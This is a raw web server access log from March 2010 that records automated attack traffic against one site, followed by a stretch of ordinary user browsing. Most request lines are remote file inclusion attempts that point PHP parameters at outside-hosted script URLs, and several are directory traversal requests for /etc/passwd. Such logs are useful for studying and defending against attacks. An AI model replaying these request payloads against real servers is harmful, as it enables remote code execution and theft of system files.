72.55.148.208 - - [03/Mar/2010:12:48:33 -0800] "GET /logs//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:12:48:33 -0800] "GET /logs/access_100126.log%20%20//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:12:48:33 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.110.224.127 - - [03/Mar/2010:12:48:51 -0800] "GET /logs///includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:49:01 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:49:01 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:49:01 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:12:50:27 -0800] "GET /board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:50:59 -0800] "GET /logs/access_100224.log%20%20//write_update.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:51:12 -0800] "GET /logs/access_100210.log%20%20//write_update.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:53:10 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:53:10 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:53:10 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:12:53:13 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:12:53:13 -0800] "GET /bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:12:53:13 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:54:33 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:54:37 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:12:56:02 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:56:39 -0800] "GET /logs//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:56:39 -0800] "GET /logs/access_100220.log%20%20//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:56:39 -0800] "GET /delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:56:43 -0800] "GET /logs/access_100209.log%20%20//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:57:40 -0800] "GET /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:58:29 -0800] "GET /logs/access_100218.log//write_update.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:59:55 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.110.224.127 - - [03/Mar/2010:13:00:06 -0800] "GET /logs///modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:02:10 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:13:02:43 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.108.64.216 - - [03/Mar/2010:13:03:19 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:13:04:54 -0800] "GET /logs/access_100129.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
201.93.165.28 - - [03/Mar/2010:13:05:02 -0800] "GET /logs/access_100203.log%20%20//bbs///////delete_all.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:09:01 -0800] "GET /index.php?config=1&base_datapath=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:09:02 -0800] "GET /index.php?config=1&base_datapath=./../../../../../../../../etc/passwd HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:09:34 -0800] "GET /logs//init_basic.php%20GALLERY_BASEDIR=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:09:34 -0800] "GET /logs/access_100128.log%20%20//init_basic.php%20GALLERY_BASEDIR=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:09:35 -0800] "GET /init_basic.php%20GALLERY_BASEDIR=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:10:24 -0800] "GET /logs/access_100128.log%20%20//init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:10:24 -0800] "GET /logs//init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:10:24 -0800] "GET /init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.93.165.28 - - [03/Mar/2010:13:10:29 -0800] "GET /logs/access_100212.log//bbs///////current_connect.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:10:33 -0800] "GET /logs/access_100128.log%20%20//init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:10:33 -0800] "GET /logs//init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:10:33 -0800] "GET /init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:11:26 -0800] "GET /logs/access_100202.log%20%20//init_basic.php%20GALLERY_BASEDIR=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:13:13:43 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:14:05 -0800] "GET /sources/functions.php?CONFIG[main_path]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:14:07 -0800] "GET /sources/functions.php?CONFIG[main_path]=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:16:02 -0800] "GET /logs/access_100222.log%20%20//write_update.php?board_skin_path=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:16:02 -0800] "GET /write_update.php?board_skin_path=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:16:02 -0800] "GET /logs//write_update.php?board_skin_path=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:16:57 -0800] "GET /logs/access_100214.log%20%20//write_update.php?board_skin_path=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:17:32 -0800] "GET /logs/access_100222.log%20%20//write_update.php?board_skin_path=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:17:32 -0800] "GET /write_update.php?board_skin_path=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:17:32 -0800] "GET /logs//write_update.php?board_skin_path=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:17:49 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:17:50 -0800] "GET /bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:17:50 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:17:55 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:17:55 -0800] "GET /logs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:17:55 -0800] "GET /logs/access_100222.log%20%20//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:17:58 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:18:10 -0800] "GET /logs/access_100214.log%20%20//write_update.php?board_skin_path=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:18:11 -0800] "GET /logs/access_100222.log%20%20//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:18:11 -0800] "GET /logs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:18:11 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:18:13 -0800] "GET /logs/access_100202.log%20%20//init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:32 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:32 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:32 -0800] "GET /bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:18:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:18:34 -0800] "GET /logs/access_100207.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:18:34 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:36 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:36 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:36 -0800] "GET /bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:41 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:18:47 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:13:19:21 -0800] "GET /logs/access_100202.log%20%20//init_basic.php%20GALLERY_BASEDIR=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:19:22 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:19:22 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:19:22 -0800] "GET /bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:19:28 -0800] "GET /logs/access_100211.log%20%20//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:19:31 -0800] "GET /logs/access_100207.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:19:31 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:19:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [03/Mar/2010:13:19:34 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:19:42 -0800] "GET /logs/access_100211.log%20%20//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:13:20:02 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:21:24 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:26 -0800] "GET /musim/profileviewer.php?profile=Mustafa HTTP/1.1" 302 24845 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:27 -0800] "GET /musim/index.php HTTP/1.1" 200 1991 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:28 -0800] "GET /musim/i/MusimLoginIntro3.5.New.jpg HTTP/1.1" 404 5258 "http://www.puaga.com/musim/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:37 -0800] "POST /musim/index.php HTTP/1.1" 302 110 "http://www.puaga.com/musim/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:38 -0800] "GET /musim/container.php HTTP/1.1" 200 7364 "http://www.puaga.com/musim/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:38 -0800] "GET /musim/subbar/meonline.php?nocache=0.35726047846760844 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:38 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.4394692887901839 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:39 -0800] "GET /musim/applications/welcome/index.php HTTP/1.1" 200 3221 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:39 -0800] "GET /musim/applications/welcome/sidebar.php HTTP/1.1" 200 18 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:39 -0800] "GET /musim/applications/welcome/breadcrumb.php HTTP/1.1" 200 187 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:40 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.28431847199630056 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:41 -0800] "GET /musim/subbar/meonline.php?nocache=0.27378064649664613 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:42 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.4652853765084023 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:43 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8626568803650224 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:44 -0800] "GET /musim/applications/board/index.php HTTP/1.1" 200 1705 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:44 -0800] "GET /musim/applications/board/sidebar.php HTTP/1.1" 200 101 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:44 -0800] "GET /musim/applications/board/breadcrumb.php HTTP/1.1" 200 212 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:45 -0800] "GET /musim/applications/board/writer.php HTTP/1.1" 200 18 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:45 -0800] "GET /musim/subbar/meonline.php?nocache=0.7403625350919701 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:45 -0800] "GET /musim/applications/board/listnews.php HTTP/1.1" 200 10116 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:45 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6003863309294579 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:46 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.01568225592430339 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:21:46 -0800] "GET /sources/functions.php?CONFIG[main_path]=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
